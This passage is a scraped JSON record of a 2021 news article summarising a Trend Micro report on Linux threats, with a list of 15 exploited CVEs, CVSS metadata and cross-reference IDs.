cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\n[](<https://go.thn.li/1-free-300-9> \"Stack Overflow Teams\" )\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-08-23T13:27:00", "modified": "2021-08-23T13:27:54", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "immutableFields": [], "lastseen": "2021-08-24T00:35:46", "history": [], "viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:3B64B132-1E7A-49BB-A187-96DB3B84BD2A", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:D8D0585E-24B7-40BE-BB84-83A85D733DDB", "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "AKB:C964B102-C1A8-42E7-AE93-2D5FCBAD769C"]}, {"type": "cve", "idList": ["CVE-2020-17496", "CVE-2020-11651", "CVE-2020-7961", "CVE-2018-7600", "CVE-2013-4547", "CVE-2020-14750", "CVE-2017-7657", "CVE-2019-0230", "CVE-2018-11776", "CVE-2021-29441", "CVE-2017-12611", "CVE-2017-9805", "CVE-2017-5638", "CVE-2020-14179", "CVE-2020-25213"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776", "RH:CVE-2017-12611", "RH:CVE-2017-5638", "RH:CVE-2020-11651", "RH:CVE-2017-7657", "RH:CVE-2017-9805", "RH:CVE-2019-0230"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-7657", "UB:CVE-2019-0230", "UB:CVE-2018-7600", "UB:CVE-2017-9805", "UB:CVE-2013-4547", "UB:CVE-2017-12611", "UB:CVE-2020-11651"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E"]}, {"type": "nessus", "idList": ["SALTSTACK_CVE_2020_11651.NBIN", "VBULLETIN_CVE-2019-16759_BYPASS_DIRECT.NASL", "NACOS_CVE-2021-29441.NBIN", "700055.PRM", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-11651", "DEBIANCVE:CVE-2013-4547", "DEBIANCVE:CVE-2018-7600", "DEBIANCVE:CVE-2017-7657"]}, {"type": "githubexploit", "idList": ["BD05B538-25EA-5C42-AE8D-229D78B57CB1", "3665098B-2115-51CF-9841-177B434C89D1", "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "6C55D55F-AFB4-53DF-84E1-D121636CE0D8", "D1AEBF0B-67F3-5851-9EF7-A324BE430205", "7B851B0A-5EBA-5ACB-ABCF-C10AB9BF13FA", "13EBE9CB-024E-5519-A3C1-40F087AD5B30", "37E4247D-5FF5-5DE9-A4A3-054D64261651", "79D8EEA6-4961-57CD-99C7-A3404C0B5307", "CF83B6A1-3B69-5983-95FF-F4E961E0A478", "E1320DCA-BE6A-566A-8074-6EDFB48DBB3F", "50FC1A87-0BE0-5156-A4D1-D38748B31D2A", "4E339DB6-4704-5991-B690-DF8D7307532E", "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "F42944FE-0023-57C2-99E2-97CFE5D670B1", "453574C2-C801-529D-A0A6-5C5E1471F1AC", "2F46389B-157F-5C57-8F47-BB41E54B0E5B", "74C2B7E6-2183-5253-8D98-183080D90557", "D5F6236D-E4DE-5B72-A482-59E5A6F196A5", "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "462E50AC-FF05-5FD6-AF86-5A4305116BB3", "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "4E77ED8E-242D-57A1-896F-06853902D509", "5E7409E5-7716-5F40-999C-E6622B806F5E"]}, {"type": "seebug", "idList": ["SSV:96425", "SSV:97207", "SSV:96420"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0779", "CPAI-2018-0192", "CPAI-2018-0849", "CPAI-2017-0747", "CPAI-2020-0361", "CPAI-2019-1100", "CPAI-2020-0869"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K60499474", "F5:K22854260", "F5:K45474286", "F5:K84144321"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-73060", "ATLASSIAN:CRUC-8497", "ATLASSIAN:BAM-18242", "ATLASSIAN:FE-7331", "ATLASSIAN:CWD-4879"]}, {"type": "thn", "idList": ["THN:89C2482FECD181DD37C6DAEEB7A66FA9"]}, {"type": "hackerone", "idList": ["H1:1336397", "H1:1003980", "H1:1153817", "H1:988550"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108243"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}], "modified": "2021-08-24T00:35:46", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-08-24T00:35:46", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"]}]}
